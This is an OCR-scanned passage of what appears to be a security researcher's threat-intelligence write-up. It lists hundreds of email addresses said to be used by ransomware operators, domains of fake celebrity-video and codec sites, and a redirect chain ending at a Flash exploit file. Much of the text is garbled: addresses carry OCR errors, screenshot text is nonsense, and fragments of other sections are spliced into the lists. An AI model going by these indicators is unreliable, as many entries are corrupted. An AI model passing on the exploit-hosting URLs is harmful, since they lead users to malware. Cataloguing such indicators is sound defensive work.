Sample currently active ransomware themed email addresses known to have been involved in 


related campaigns: 
6ix9@asia.com 
restorealldata@firemail.cc 
gorentos@bitmessage.ch 
yourfilesl@cock.li 
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9ix6@usa.com 
tcprx@tutanota.de 
contact@contipauper.com 
adolfgizbreht234@gmail.com 
dts1024@tutanota.com 
mosteros@firemail.cc 
nmosteros@firemail.cc 
ngorentos@bitmessage.ch 
godecrypt@onionmail.org 
manager@mailtemp.ch 
managerhelper@airmail.cc 
dable19@mail.fr 

vassago 0203@tutanota.com 
vm1liqzi@aol.com 
openpgp@foxmail.com 
SantaGman@criptext.com 
xcsset@criptext.com 
zphc@cock.li 
Recovery@qbmail.biz 
decrypt@europe.com 
tiocapvbu@aol.com 
walletdata@hotmail.com 
savebase@aol.com 
getscoin3@protonmail.com 
moloch _helpdesk@tutanota.com 
mstr.hack@protonmail.com 
plganstalp@aol.com 
clean@onionmail.org 
triplock@tutanota.com 
newpatek@cock.|i 
potentialenergy@mail.ru 
godecrypt@tfwno.gf 
stevemartin777@protonmail.com 
stevemartin777@cock.li 
Benford333@criptext.com 
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at the same IP as the fake celebrity sites which I'll expose in this post. 


starfeed1 .com - (85.255.117.218) 
codecservicel .com 
siteresultsl1 .com 
codecservice6 .com 
celebs69 .com 
topdirectdownload .com 
sexlookupworld .com 
favoredtube .com 
yourfavoritetube .com 
wwvyoutube .com 
celebsnofake .com 
celebsvidsonline .com 
celebstape .com 
freevidshardcore .com 
topsoftupdate .com 
porndebug .com 
newfunnyvideo .com 
bestfunnyvids .com 
pornmoviestube .net 


Alyssa Milano Steamy Car Scene 


PP) Windows Media Player cannot play the fle. The Player 
=/ does not support the format you are trying to play. 
Please install video codec update 


|| Cancel | Continue 
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Benford333@protonmail.com 
Benford333@tutanota.com 
nBenford333@criptext.com 
nBenford333@protonmail.com 
nBenford333@tutanota.com 
itdecconsult@yahoo.com 
elixuwaril@gmail.com 
donuvnami@gmail.com 
shadowghosts@tutanota.com 
fortihooks@protonmail.com 
nshadowghosts@tutanota.com 
nfortihooks@protonmail.com 
helpforyoupc@tutanota.com 
1024back@tuta.io 
triplock@cock.li 
popca@qq.com 
cryptocash@aol.com 
MorganBel23@yahoo.com 
MaryaLawra26@gmail.com 
ForestMem33@aol.com 
nMorganBel23@yahoo.com 
nMaryaLawra26@gmail.com 
nForestMem33@aol.com 
moloch _helpdesk@protonmail.ch 
buydecrypt@qq.com 
varasto@firemail.cc 
nvarasto@firemail.cc 
gonald58@cock.|i 
thecurelegion@protonmail.com 
support981723721@protonmail.com 
addlict@yahoo.com 
sifremicoz@protonmail.com 
biashabtc@redchan.it 
debri@keemail.me 


RestorFile@tutanota.com 
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woodratofficial@outlook.com 
nwoodratofficial@outlook.com 
adresspower@tutanota.com 
yourfile2020@protonmail.com 
info@anti-spyware-101.com 
helpmanager@mail.ch 
restoremanager@airmail.cc 
Hiden _pro@aol.com 

Hiden _pro@tutanota.com 
LLTP@mail2tor.com 
contatomaktub@email.tg 
info@bestsecuritysearch.com 
decryptyourdata@qq.com 
bitcoinl143@india.com 
helpteam@mail.ch 
helpmanager@airmail.cc 
restorefiles@firemail.cc 
UltimateHelp@techmail.info 
help.crypt@aol.com 
brokenbrow.teodorico@aol.com 
Fud@india.com 
Alex.vlasov@aol.com 

Diablo diablo2@aol.com 
Restore@protonmail.ch 
Catsexy@protonmail.com 
Guardware@india.com 
Systemdown@india.com 
Milarepa.lotos@aol.com 
Sitaram108@india.com 
GruzinRussian@aol.com 
Ncrypt@cock.li 
Xbotcode@gmail.com 
Meldonii@india.com 
Recuperadados@protonmail.com 
amagnus@india.com 
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Hairullah@inbox.Iv 
Gerkaman@aol.com 
Matrix9643@yahoo.com 
slaker@india.com 
Space _rangers@aol.com 
Sos@anointernet.com 
ihurricane@sigaint.org 
Drugvokrug727@india.com 
Help@decryptservice.info 
Grand _car@aol.com 
Batman _good@aol.com 
Decryptallfiles3@india.com 
mkgoro@india.com 
Savepanda@india.com 
Cocoslim98@gmail.com 
fixfiles@protonmail.ch 
Bitcoinpay@india.com 
Masterlock@india.com 
Cyber baba2@aol.com 
Siddhiup2@india.com 
Mich78@usa.com 
Raa-consultl@keemail.me 
Lavandos@dr.com 
Calipso.god@aol.com 
hnumkhotep@india.com 
Mailrepa.lotos@aol.com 
rescuers@india.com 
Legioner_seven@aol.com 
avastvirusinfo@yandex.com 
garryweber@protonmail.ch 
Love.server@mail.ru 
Okean-1955@india.com 
Ramachandra7@india.com 
Decipher@keemail.me 
File-help@india.com 

18225 


Makdonalds@india.com 
Supermagnet@india.com 
Last centurion@aol.com 
haizenberg@aol.com 
Doctor@freelinuxmail.org 
Suppteam01@india.com 
Supportfriend@india.com 
Radxlove7@india.com 
Happydayz@india.com 
black.world@tuta.io 

Seven _legion@aol.com 
Ninja _gaiver@aol.com 
safeanonym14@sigaint.org 
fantomd12@yandex.ru 

Age _empires@india.com 
Help you@india.com 
DIGITALKEY@163.com 
SharkO1@msgden.com 
Helpme@freespeechmail.org 
Grapn206@india.com 
wyna@nyu.edu 
Suppteam03@india.com 
assistant@bitmessage.ch 
youneedmail@protonmail.com 
Thedon78@mail.com 
Orgasm@india.com 
Decryptutility@protonmail.com 
Ceril33@india.com 

A _Princ@aol.com 
Decryptallfiles@india.com 
Melme@india.com 
helpmeonce@mail.ru 
Bitcoinrush@imail.com 
webmafia@asia.com 
Nomoneynohoney@india.com 
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Blacknord@tutanota.com 
Helper023@cock.li 
partytime1l23@default.rs 
Recoverfiles2017@qq.com 
GuardBTC@cock.|i 
Wisperado@india.com 
jonskuper578@india.com 
Decrypthelp@qq.com 
MerlinStusan@protonmail.com 
Decrypthelp@qq.co 
MildredRLewis@teleworm.us 
systems@tutanota.com 
xzet@tutanota.com 
Payfornature@india.com 
szem@tutanota.com 
Peekabooo@qq.com 

help 911 support@rambler.ru 
help@tutanota.com 
Szems@tutanota.com 
Tizer78224@india.com 
Tizer77234@protonmail.com 
recfiles@protonmail.com 
Patagonoa92@tutanota.com 
Worldcry@cock.li 
Opencode@india.com 
Hellstaff@india.com 
mr.dec@tutanota.com 
mr.dec@protonmail.com 
recoveryl@writeme.com 
gardengarden@cock.li 
JoniCarter@protonmail.com 
servicedeskpay@protonmail.com 
brbrcodes@gmail.com 
datastore2018@mail.ru 


f1220@tuta.io 
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sebastiennolet92@gmail.com 
castor-troy-restore@protonmail.com 
petropasevich@aol.com 
blacklist@clock.li 
Blacklist@cock.li 
Mammon-decrypt@protonmail.com 
Stopencrypt@qq.com 

Light Yagami@tuta.io 
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deposithere@e-mail.ph 
devilguy666@protonmail.com 
devilguy@sigaint.org 
ea345@sigaint.org 
dj.elton@hotmail.co.uk 
john.perezzka@gmail.com 
lambing.watson@gail.com 
restoring sup@india.com 


restoring sup@computer4u.com 
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restoring reserve@india.com 
zipper@email.tg 
andresaha82@gmail.com 
viastnou.hlavou@mailfence.com 
random _anonymous@gmail.com 
crannbest@foxmail.com 
lanran-decrypter@list.ru 
tom.anderson@india.com 

DE coDER@mail2tor.com 
scryptx@meta.ua 
robert.swat@qip.ru 
helppme@india.com 
hepl1112@aol.com 
some@mail.ru 
ziz777@gmx.com 
ziz777@india.com 
ursa2277@gmx.com 
ursa2277@yahoo.com 
ursa2277@india.com 
ursa2277@bk.ru 
alexjer554@gmx.com 
alexjer554@india.com 
batary5588@gmx.com 
batary5588@india.com 
batary5588@protonmail.com 
robocript@india.com 
robocript@gmx.us 
robocript@protonmail.ch 
Panzergen552@gmx.de 
Panzergen552@protonmail.com 
Panzergen552@india.com 
vendetta553@gmx.de 
vendetta553@india.com 
vendetta553@protonmail.com 
Filegorillal388@gmx.de 
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Filegorillal388@india.com 


Filegorillal388@protonmail.com 


vine77725@gmx.de 
vine77725@india.com 
vine77725@protonmail.com 
panda7499@gmx.de 
panda7499@india.com 
panda7499@protonmail.com 
jonskuper578@gmx.de 
jonskuper578@protonmail.com 
fox2278@india.com 
fox2278@protonmail.com 
fox2278@gmx.de 
lion7872@protonmail.com 
lion7872@gmx.de 
lion7872@india.com 
Tizer78224@gmx.de 
filesreturn247@gmx.de 
filesreturn247@india.com 
filesreturn247@protonmail.com 
shieldO@usa.com 
3048664056@qq.com 
patrik.swize@gmx.de 
Slanler111@protonmail.com 
help244@ya.ru 
locker@bitmessage.ch 
infokey24@india.com 
a.rashepkin@gmail.com 
lucaSl12@mail.ru 
fromriga@yahoo.com 
darren.griffin@live.co.uk 
fascom04@mail.ru 
maslovagoluba65@gmail.com 
kaz3162@ya.ru 


romanko.a@gmail.com 
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betmenbar@gmail.com 
akorulin@gmail.com 
jo-l@yandex.ru 
3270604@gmail.com 
stancellove@yandex.ru 
aesklim@gmail.com 
zapravkagomel@gmail.com 
k.oltynaeva@rambler.ru 
dk.sumy@gmail.com 
3axapka@gmail.com 
6761994@mail.ru 
pye944@gmail.com 

ui _aleksey@mail.ru 
jawaclub777@rambler.ru 
nikolasautumn@gmail.com 
Volosi87@gmail.com 
alfasoft@ex.ua 
yarkaya05@gmail.com 
kato50@mail.ru 
vOvanidze@mail.ru 
mrbin775@gmx.de 
mrbin775@protonmail.com 
decryptmystuff@protonmail.com 
lioghaly@india.com 
kfrvokr@protonmail.ch 
vapeefiles@aol.com 
infocrypt@india.com 
helper@bitmessage.ch 
BM-2cX2s3Zoqw9JFC9QELpPPPmuKBGRQqF7pL7@bitmessage.ch 
lalabitch2017@yandex.com 
filesrestore@tutanota.com 
wowsmith123456@posteo.net 
muhendis@mail.ua 
muhends@mail.ua 
decr@cock.li 
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decrsup@cock.li 
payoff@cock.li 
payoff@bigmir.net 
chines34@protonmail.ch 
oceannew _vb@protonmail.com 
garryhelpyou@qq.com 
garrymagic@tutanota.com 
gladius rectus@aol.com 
gladius rectus@india.com 
universe1@protonmail.ch 
universe11@bigmir.net 
payfordecrypt@qq.com 
crypthelp@qq.com 
darkwaiderr@tutanota.com 
darkwaiderr@gmx.de 
decrypt24@protonmail.com 
asdqwer123@cock.li 
assistance@firemail.cc 
goldwave@india.com 
blackworld@cock.li 
fidel_romposo@aol.com 
StormRansomware@gmail.com 
ms.heisenberg@aol.com 
Wecanhelp@protonmail.com 
XXXXXXX @XXXX.XXX 
onion33544@india.com 
redboot@memeware.net 
decryptorx@cock.li 
fuck4u@cock.li 
irmagetstein@india.com 
Jackie7@asia.com 
Jchan@india.com 
hyakunoonigayoru@yahoo.co.jp 
B32588601@163.com 
TheYuCheng@yeah.net 
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BaYuCheng@yeah.net 
zip@emaail.tg 
contactfileszip@email.tg 
contato.arquivoszip@email.tg 
contatoarquivoszip@private-mail.com 
OttoZimmerman@protonmail.ch 
job2019@tutanota.com 

bad boy700@aol.com 
cadillac.407@aol.com 

Everest 2010@aol.com 
raphaeldupon@aol.com 
paper planel@aol.com 
barcelona _100@aol.com 
elizabethz7culjones@aol.com 
beltoro905073@aol.com 
gomer simpson2@aol.com 
ofizducwelll988@aol.com 
FobosAmerika@protonmail.ch 
phobos helper@xmpp.jp 
phobos _helper@exploit.im 
phobos.encrypt@qq.com 
pixell@tutanota.com 
elizabeth67bysthompson@aol.com 
pixell@cock.li 
tlalipidas1978@aol.com 
cercisoril979@aol.com 
posiccimen1982@aol.com 
prejimzalma1972@aol.com 
taverptintral985@aol.com 
withdirimugh1982@aol.com 
hidebak@protonmail.com 
stanodexnel1982@aol.com 
waitheisenberg@xmpp.jp 
tedmundboardus@aol.com 
tylecotebenji@aol.com 
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supersoft21freeware .com 
kvm-secure .com 
kvymsecure .com 
themusic-O8portal .com 
adultstreamportal .com 
streamxxxvideo .com 
antivirus-2008-pro .com 
antivirus2008-pro .com 
antivirus-2008pro .com 
thefunny-08 .com 
thestars-08 .com 
thestars08 .com 
celebsnofake .com 
adult-s-portal .com 
adultsoftcodec .com 
adultstreamportal .com 
adultxx-18 .com 


Nucle 


Celebrities 


Aicee : @8 Mr. Skin Celebs cet instant and tree access to several thousands of celebrity Pictures and Videos! Hot & wild 
Advppa Uatgne ‘celebs like sexy Christina Aguilera and Britney Spears! 


Slack Eved Peas New crletnty pics 


~ Mita Jovowten (4), Home Carmenoga (20), Sasmmene Crosman (1) 


New coletelty pics: 
Seeetnes Sat ~ Jennie Love Hits (36), Assactacns Crousan (1). Baa fea (14) 
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phobos _helpper@xmpp.jp 
decryptfiles@420blaze.it 
decryptfiles@cock.lu 
absonkaine@aol.com 
klemens.stobe@aol.com 
autrey.b@aol.com 
alphonsepercy@aol.com 
park.jehu@aol.com 
kylenoble726@aol.com 


phobosrecovery@cock.li 


phobosrecovery@tutanota.com 


darillkay@aol.com 

abbott wearing@aol.com 
thorpe.grand@aol.com 
luciolussenhoff@aol.com 
grattan.|@aol.com 
costellon@aol.com 
carmichael.lion@aol.com 
night _illusion@aol.com 
cello _dodds@aol.com 
hickeyblair@aol.com 
com-gloria@tutanota.com 
com-gloria@protonmail.com 
nichols I@aol.com 
fileo@protonmail.com 
back7@protonmail.ch 
keyO7@qq.com 
kew07@qq.com 
helpyourdata@qq.com 
ramsey _frederick@aol.com 
lofutesdogg1983@aol.com 
karlosdecrypt@outlook.com 
gabbiemciveen@aol.com 
christosblee@aol.com 


randal _inman@aol.com 
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gherardobaxter@aol.com 
upfileme@protonmail.com 
Donovantudor@aol.com 
simonsbarth@aol.com 
thedecrypt111@qq.com 
walletwix@aol.com 
ban.out@foxmail.com 
datadecryption@countermail.com 
leeming.derick@aol.com 
helpteam38@protonmail.com 
danger@countermail.com 
William _Kidd _2019@protonmail.com 
wewillhelpyou@qq.com 
hartpole.danie@aol.com 
lockhelp@xmpp.jp 
batecaddric@aol.com 
burnofin@hotmail.com 
cleverhorse@protonmail.com 
greg.philipson@aol.com 
hadleeshelton@aol.com 
fileisafe@tuta.io 
Keta990@protonmail.com 
The777@tuta.io 
supportcrypt2019@cock.li 
supportcrypt2019@protonmail.com 
zoyel1596@msgden.net 
zoye596@protonmail.com 
b.morningtonjones@aol.com 
dennet.smellie@aol.com 
Quantroei@protonmail.com 
sailormorgan@protonmail.com 
irvinclarke@aol.com 
crysall.g@aol.com 
raynorzlol@tutanota.com 
raynorzlol@protonmail.com 
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raynorzlol@thesecure.biz 
2172998725@qq.com 
friends2019@protonmail.com 
lachneyorlachb@aol.com 
worldofdonkeys@protonmail.com 
worldofdonkeys@xmpp.jp 
beautydonkey@xmpp.jp 
larabita@cock.li 

member987 @tutanota.com 
member987 @cock.|i 
tirrelllipps@aol.com 

back ins@protonmail.ch 
plombiren@qq.com 
bbbitcrypt@tutanota.com 
bbitcrypt@protonmail.com 
limboshuran@cock.li 
decryptbox@airmail.cc 
repairfiles@foxmail.com 
files2@protonmail.com 
zax444@qq.com 
zax4444@qq.com 
recovermyfiles2019@thesecure. biz 
horsesecret@xmpp.jp 
kalle.tomlin@aol.com 
tirrellipps@aol.com 
captainpilot@cock.li 
onlyfiles@aol.com 
britt.looper@aol.com 
stuart.wittie@aol.com 
DatarestOre@aol.com 
decriptionsupport911@airmail.cc 
washapen@cock.|i 
restorebackup@qq.com 
veritablebee@protonmail.ch 


viadolorosa@tuta.io 
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funnyredfox@aol.com 
lewisswaffield.a@aol.com 
XXXNXXX@cock.li 
hanesworth.fabian@aol.com 
ciaprepoulep1977@aol.com 
bowen.bord@aol.com 
recoveryfast@airmail.cc 
patern32@protonmail.com 
Unlockfiles@qq.com 
kickclakus@protonmail.com 
kickclak@cock.li 
relvirosal981@aol.com 
cleverhorse@ctemplar.com 
cleverhorse@xmpp.jp 
theonlyoption@qq.com 
debourbonvincenz@aol.com 
cosmecollings@aol.com 
phobos healper@xmpp.jp 
stocklock@airmail.cc 
restoringbackup@airmail.cc 
berne.fiddell@aol.com 
gruzudo@cock.li 

harlin marten@aol.com 
octopusdoc@mail.ee 
octopusdoc@airmail.cc 
agent5305@firemail.cc 
kenny.sarginson@aol.com 
francispilmoor@aol.com 
keysfordecryption@airmail.cc 
keysfordecryption@jabb3r.org 
Admincrypt@protonmail.com 
bexonvelia@aol.com 
maitlandtiffaney@aol.com 
topot@cock.li 
decryptfiles@qq.com 
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decryptfiles@hot-chilli.eu 
decrypt4data@protonmail.com 
lucky _top@protonmail.com 
apoyo2019@protonmail.com 
saveyourfiles@qq.com 
paybtc@sj.ms 
jabberpaybtc@sj.ms 
ofizducwe111988@aol.com 
kabennalzly@aol.com 
flexney.pail@aol.com 
anamciveen@aol.com 
dominga.k@aol.com 
chagenak@airmail.cc 
mr.helper@qq.com 
kokux@tutanota.com 
decrypt here@xmpp.jp 
mr.helper@jabb3r.de 
decrypt here@xrnpp.jp 
jewkeswilmer@aol.com 
squadhack@emaail.tg 
online24decrypt@airmail.cc 
danianci@airmail.cc 
youcanwrite24h@airmail.cc 
patiscaje@airmail.cc 
helprecover@foxmail.com 
recoverhelp2020@thesecure. biz 
sverdlink@aol.com 
dessert guimauve@aol.com 
2183313275@qq.com 
werichbin@protonmail.com 
werichbin@cock.li 
wang _team777@aol.com 
wang team999@aol.com 
cynthia-it@protonmail.com 
leonardo@cock.lu 
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backup.iso@aol.com 
deltatechit@protonmail.com 
deltatech@tuta.io 
mccreight.ellery@tutanota.com 
2020x0@protonmail.com 
2020x@cock.|u 
verious1@cock.li 
filesreturn@cock.li 
decphob@protonmail.com 
mecybaki@firemail.cc 
naqohiky@firemail.cc 
ezequielanthon@aol.com 
robinhood@countermail.com 
eccentric _inventor@aol.com 
noyes.brice@aol.com 
sookie.stackhouse@gmx.com 
SimpleSup@cock.li 
helpisos@aol.com 
DavidsHelper@protonmail.com 
SimpleSup@tutanota.com 
subikO99@tutanota.com 
Helpforfiles@xmpp.es 
unlockfiles2021@cock.li 
spacexhuman@tutanota.com 
spacexhuman@protonmail.com 
spacexhuman@jabb.im 
bernard.bunyan@aol.com 
saveisos@aol.com 
devos@countermail.com 
kxxe@airmail.cc 
guxehys@mailfence.com 
sparem@kolabnow.com 
wmanxtere@privatemail.com 
raypas@goat.si 
save2020@qq.com 
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xizers@airmail.cc 
JackKarter@gmx.com 
recoverycode@protonmail.com 
pyyring23@protonmail.com 
fastway@tuta.io 
miadowson@tuta.io 
unlocker@criptext.com 
virtualhorse1@protonmail.com 
serhio.vale@tutanota.com 

use _harrd@protonmail.com 
useHHard@cock.|i 
victorlustig@gmx.com 
elfbash@protonmil.com 
helpyoubus11@tutanota.com 
helpyourdesk11@protonmail.com 
xgen@tuta.io 

zgen@tuta.io 
deparisko@secmail.pro 
deparisko@dnmx.org 
eddyayman@gmail.com 
asdqzx51@gmail.com 
maxicrypt@cock.li 
maxidecrypt@protonmail.com 
nullforwarding@qualityservice.com 
m4zm0v@keemail.me 
JeanRenoAParis@protonmail.com 
Leviathanl13@protonmail.com 
gentilpascal@bitmessage.ch 
brian.r.goodwin@protonmail.com 
imBoristheBlade@protonmail.com 
gomer@horsefucker.org 
gomersimpson@keemail.me 
johnsonwhate@protonmail.com 
johnsonwhate@tutanota.com 
A654763764@qq.com 
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decrypterO2@cumallover.me 
piterpoen02@keemail.me 
jimmtheworm@dicksinmyan.us 
newrecoverybot@pm.me 
sqlbackup3@mail.fr 
doctor666@mail.fr 
newrecoveryrobot@pm.me 
doctor666@cock.li 
repairdb@seznam.cz 
repairdb@mail.fr 
decryptor911@airmail.cc 
decryptor666@420blaze. it 
RemotePChelper@cock.|i 
remotePChelper@tutanota.com 
BCPFILE17@tutanota.com 
returndb@seznam.cz 
returndb@airmail.cc 
support911@cock.li 
xilttbg@tutanota.com 
doctorhelp2120@cock.li 
repairdatadochelp@airmail.cc 
returndb@airmail.ee 
1restOre@protonmail.com 
1restOre@cock.|i 
cryptolifeguard@cock.li 
unlOck@keemail.me 
8472host@mail.fr 
8472host@cock.li 
legalrestore@tutanota.com 
SwOrdflsh@cock.li 
Swordflsh@tutanota.com 
host2021@tutanota.com 
aid.keepcalm@seznam.cz 
aid.keepcalm@protonmail.com 
owerhacker@hotmail.com 
18260 


skgrhk2018@tutanota.com 
skgrhk2018me@tutanota.com 
sqqsdr01@keemail.me 
name4v@keemail.me 
dfs20@keemail.me 
styver.goodman@aol.com 
maktoob786@takfir24.net 
haraam@takfir24.net 
haraam@alayam24.net 
blackpanda007 @torbox3ui0t6wchz.onion 
btc.freshOl@gmail.com 
unixc47@gmail.com 
d3g1d5@gmail.com 
khiwosang@gmail.com 
alpha2018a@aol.com 
ZaszyfrowanePliki@ZaszyfrowanePliki.us 
decry1@cock.li 
decry2@cock.li 
BM-2cTzz6rwtd8d7qd1wVegH6sZ44GbNPV8Li@bitmessage.ch 
ransomware@sj.ms 
randomlocker@tuta.io 
rebushelp@airmail.cc 
rebushelp@protonmail.com 
rebushelper@exploit.im 
cryptghOst@protonmail.com 
160505@tt3j2x4k5ycaa5zt.onion 
kvlly@protonmail.ch 
iohw634@gmail.com 
decryptmefinger@gmail.com 
backuppc@tuta.io 
backuppc@protonmail.com 
backuppcl1@protonmail.com 
b4ckuppcl@yandex.com 
b4ckuppc2@yandex.com 
backuppcl@dr.com 
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TimisoaraHackerleam@protonmail.com 
m4xroothackerteam@protonmail.com 
Vitaly. Yermakov@protonmail.com 
VitalyYermakov@cock.li 
UnlockAlexKingman@protonmail.com 
soetrisno.bachir@kein.go.id 

support wc@bitmessage.ch 
auuahk@yandex.com 
ouuohk@eclipso.eu 
barracuda@airmail.cc 
barracudahelp@protonmail.com 
barracudahelper@exploit.im 
cryptlocker@tutanota.com 

crypto wannacash@protonmail.com 
help73@tutanota.com 
help73@protonmail.com 
buratino@cock.li 

thyrexsuck@cock.li 
absolutefreedom@cock.|i 
lovelife@cumallover.me 
lovelife@xabber.org 
onlymoney@firemail.cc 
noallpossible@cock.li 
supermax@cock.|u 
nichegolichnogo@airmail.cc 
clubnika@elude.in 

lisasu@elude.in 

clubnika@cock.li 

safronov@cock.|i 
safronov123@tuta.io 
mylifeisfear@cock.li 
netakaykakvse@cock.li 
euphoria-help@elude.in 
omygosh@cock.li 

itstome@cock.li 
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And while none of these seem to be taking advantage of client-side exploits, a Russian 
celebrity site that seems to by syndicating the malicious redirectors from a legitimate ad- 


vertising network, is an exception worth point out due to the Adobe Flash player exploit it’s 
attempting to take advantage of. 


Bestcelebs .ru javascript redirectors through several different doorways : 


textsntre 
text/html 
text/html 


text/html; cf 


textshtrel 


text/htredl; charse 


>EOE > Ow « 


textjhtr; chars 


crklab .us/index.php => firstblu .cn/3.php?19383577 => xanjan .cn/in.cgi?mytraf => atom- 
akayan .biz/afterftpcheck/2603/index.php => 
toksikoza .net/fi/index.php?mytraf => toksikoza .net/fi/1.swf 


What you see is so not what you get. 


1. http: //ddanchev. blogspot . com/2008/06/fake-celebrity-video-sites-serving. htm 


4.8.20 Web Based Botnet Command and Control Kit 2.0 (2008-08-22 18:22) 
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petrov441@protonmail.com 
johnstang@zoho.eu 
johnsmith987654@tutanota.com 
t314.520@qq.com 
omg-help-me@openmailbox.org 
backdata@cock.li 
passsenderdec@gmail.com 
ik253@email.vccs.edu 
MilesFlannagan@protonmail.com 
rsupp@protonmail.ch 
rupp@protonmail.ch 
decryptscrabber@mail.ru 
scrabber@mail.ru 
filekerk@tutanota.com 
yougame@protonmail.ch 
swordofsakura@india.com 
krupalupium@india.com 
brianmaps@gmail.com 

amigo a@india.com 
desktopmain228@india.com 
care _nim@tutamail.cc 
desktopman228@india.com 
decrypteasy@protonmail.cc 
kreker@india.com 
filesharper@420blaze. it 
cricket@tutanota.com 

data _safe@mail.com 
datasafe@airmail.cc 
dec.service@protonmail.com 
nmare@cock.li 
incognitoman@protonmail.com 
siniyzabor@protonmail.com 
recover 24 7@protonmail.com 
happy _sysadmin@protonmail.ch 
iracomp4@protonmail.ch 
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iracomp2@protonmail.ch 

mrddnet _support@protonmail.ch 
achtung _admin@protonmail.com 
aam _sysadmin@protonmail.com 
helpadmin2@protonmail.com 
helpadmin2@cock.|i 

under _amur@protonmail.ch 
fedelsupportagent@cock.li 
admin@cuba-supp.com 

cuba _support@exploit.im 

LR FWS_H2M _ET@protonmail.ch 
desync@airmail.cc 
yeahdesync@airmail.cc 
CottleAkela@protonmail.com 
QyavauZehyco1994@o2.pl 
AbbsChevis@protonmail.com 
IjugodiSunovib98@o2.pl 
JinMaglaya@protonmail.com 
YpilokOmoadae1994@o02.pl 
SuzuMcpherson@protonmail.com 
AsuxidOruraep1999@o02.pl 
DharmaParrack@protonmail.com 
wyattpettigrew8922555@mail.com 
MayarChenot@protonmail.com 
QicifomuEjijika@o2.pl 
AperywsQaroci@o2.pl 
AsuxidOruraep1999@o2.pl 
Couwetlzotofo@o2.pl 
DutyuEnugev89@o2.pl 
PhanthavongsaNeveyah@protonmail.com 
RezawyreEdipi1998@o2.pl 
RomanchukEyla@protonmail.com 
SayanWalsworth96@protonmail.com 
SchreiberEleonora@protonmail.com 
artemy75@protonmail.com 
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artemy75@cock.|i 
artemy75@tutanota.com 
jokeroo@protonmail.com 
jokeroo@exploit.im 
info@borontok.uk 
info@botontok.uk 
viethckr@yandex.com 
silena.berillo@gmail.com 
hto2018@yandex.ru 
supportd@tfwno.gf 
helper@tfwno.gf 
helperx@tuta.io 
tellyouthepass@protonmail.com 
coinmoney@cock.|i 
asmo49@asmodeus.us 
legion.developers72@gmail.com 
BackFileHelp@protonmail.com 
dcyptfils@protonmail.ch 
letitbedecryptedzi@gmail.com 
RECOVERUNKNOWN@protonmail.com 
Helpcrypt1@tutanota.com 
DecrypterSupport@protonmail.com 
unlockme123@protonmail.com 
Mr.TeslaBrain@gmail.com 
Dataadecrypt@Cock.|i 
decryp7@foxmail.com 
Decryptions@protonmail.com 
ScorpionEncryption@protonmail.com 
FilesHelp@tutanota.com 
jacdecr@tuta.io 
Steven77xx@protonmail.com 
Rezcrypt@cock.li 
decryptfiles@horsefucker.org 
DatarestOre@protonmail.com 
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Hiddenhelp@cock.|i 
decodehelp@cock.|i 
RestoreData@airmail.cc 
fixallfiles@tuta.io 
Recoveryhelp2019@protonmail.com 
leltitbedecrypteddzi@gmail.com 
blackroot54@protonmail.com 
recovery94@cock.li 
Mr.TeslaBrain@protonmail.com 
teslabrain@cock.li 
filedownload2020@protonmail.com 
rx99@cock.li 
Honeylock@protonmail.com 
AdvancedBackup@protonmail.com 
recover85@protonmail.com 
unlock0101@protonmail.com 
rdpmanager@airmail.cc 
SupportOdveta@protonmail.com 
SupportOdveta@elude.in 
softs98@protonmail.com 
josefrendal797@gmail.com 
tools1990m@gmail.com 
toolsI990m@gmail.com 
vashmail@protonmail.com 
vashmail@ctemplar.com 
vashmail@firemail.cc 
Filedecryptor@protonmail.com 
darkencryptor@tutanota.com 
smartrecav@tutanota.com 
decodeodveta@protonmail.com 
decrypt0077@gmail.com 
Decfile431@tutanota.com 
decryptfiless@gmail.com 

new _wave@tuta.io 
newwave@airmail.cc 
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9eab6e85bd12b@tutanota.com 
t310ea89b4347@protonmail.com 
getcrypt@cock.li 
cryptget@tutanota.com 
OFFTITAN@cock.|i 
cryptomadbusiness@protonmail.com 
info@morris2uk.com 
FreeWizard9@protonmail.com 
sherlokcock@cock.li 
omegax0@protonmail.com 
flowerboard@torguard.tg 
flower.harris@protonmail.com 
flower.harris@tutanota.com 
flowerboard@protonmail.com 
doris.sammer@rasendmail.com 
mcrypt2019@yandex.com 
hildaseriesnetflix125@tutanota.com 
hildaseriesnetflix125@horsefucker.org 
hildalolilovesyou@airmail.cc 
hildalolilovesyou@memeware.net 
goodmen@countermail.com 
datareesstore@tutanota.com 
goodmen@cock.li 
X280@protonmail.com 
zxqwopnm@tutanota.com 
decrypt.russ@protonmail.com 
petersburgrecover@protonmail.com 
dawndec001@protonmail.com 
goeila@countermail.com 
gupzkz@cock.li 

supportpc@cock.li 
goodsupport@cock.li 
abcd-help@countermail.com 
pcabcd@countermail.com 


recoverymanager@cock.li 
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phomen@cock.li 
phomen@airmail.cc 
lafoievologjaninl23@tutanota.com 
lafoievologjaninl123@protonmail.com 
mantiticvil976@protonmail.com 
fahydremu1981@protonmail.com 
flapalintal950@protonmail.com 
xersami@protonmail.com 
bigbosshorse@ctemplar.com 
bigbosshorse@xmpp.jp 
heronpiston@ctemplar.com 
heronpiston@xmpp.jp 
igbosshorse@xmpp.jp 
horseleader@xmpp.jp 
bigboss@thesecure. biz 
buratino@firemail.cc 
buratino2@tutanota.com 
buratin@torbox3uiot6wchz.onion 
ret3pwn@gmail.com 

cheotOs _de@protonmail.com 
puljaipopre1981@protonmail.com 
viomukinam1978@protonmail.com 
onlinebigbrotheriswatchingyou@protonmail.com 
onlinebigbrotheriswatchingyou@tutanota.com 
msupport2019@protonmail.com 
msupport@elude.in 
sambrero@tfwno.gf 
dupsano@cock.|u 
MattCohn@tutanota.com 
BruceCohn88@protonmail.com 
unlocking2020@protonmail.ch 
burlocker2020@tuta.io 
runlocker@protonmail.com 
ranlock@keemail.me 

cluff sarah@aol.com 
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restmefast@tutanota.com 
helpservise@mail2tor.com 
helpservise@ctemplar.com 
recovery2020@cock.li 
yesbay@protonmail.com 
uspexl1@cock.li 
uspex2@cock.li 
China.Helper@aol.com 
regina4hgoregler@gmx.com 
pansymarquis@yahoo.com 
filescros@protonmail.ch 
filescrp@420blaze.it 
filescro@yandex.ru 
helpservisee@ctemplar.com 
helpservisee@cock.li 
helpoperator2@protonmail.com 
helpoperator@firemail.cc 
helpoperator@thesecure.biz 
udachal23@mail2tor.com 
payfast290@mail2tor.com 
ferrari@msgsafe.io 
bannedlands@msgsafe.io 
3475857701@qq.com 
iknowyouandiseeyou@protonmail.ch 
lokeradmin@cock.li 
adminsysloker@airmail.cc 
UneGarcOn1@cock.li 
LejJetepreYO@cock.li 
behappywithyourdata@airmail.cc 
happydataowner@firemail.cc 
05250lock@tutamail.com 
05250lock@protonmail.com 
05250lock@tut.com 
grdoks@tutanota.com 


dweezells@airmail.cc 
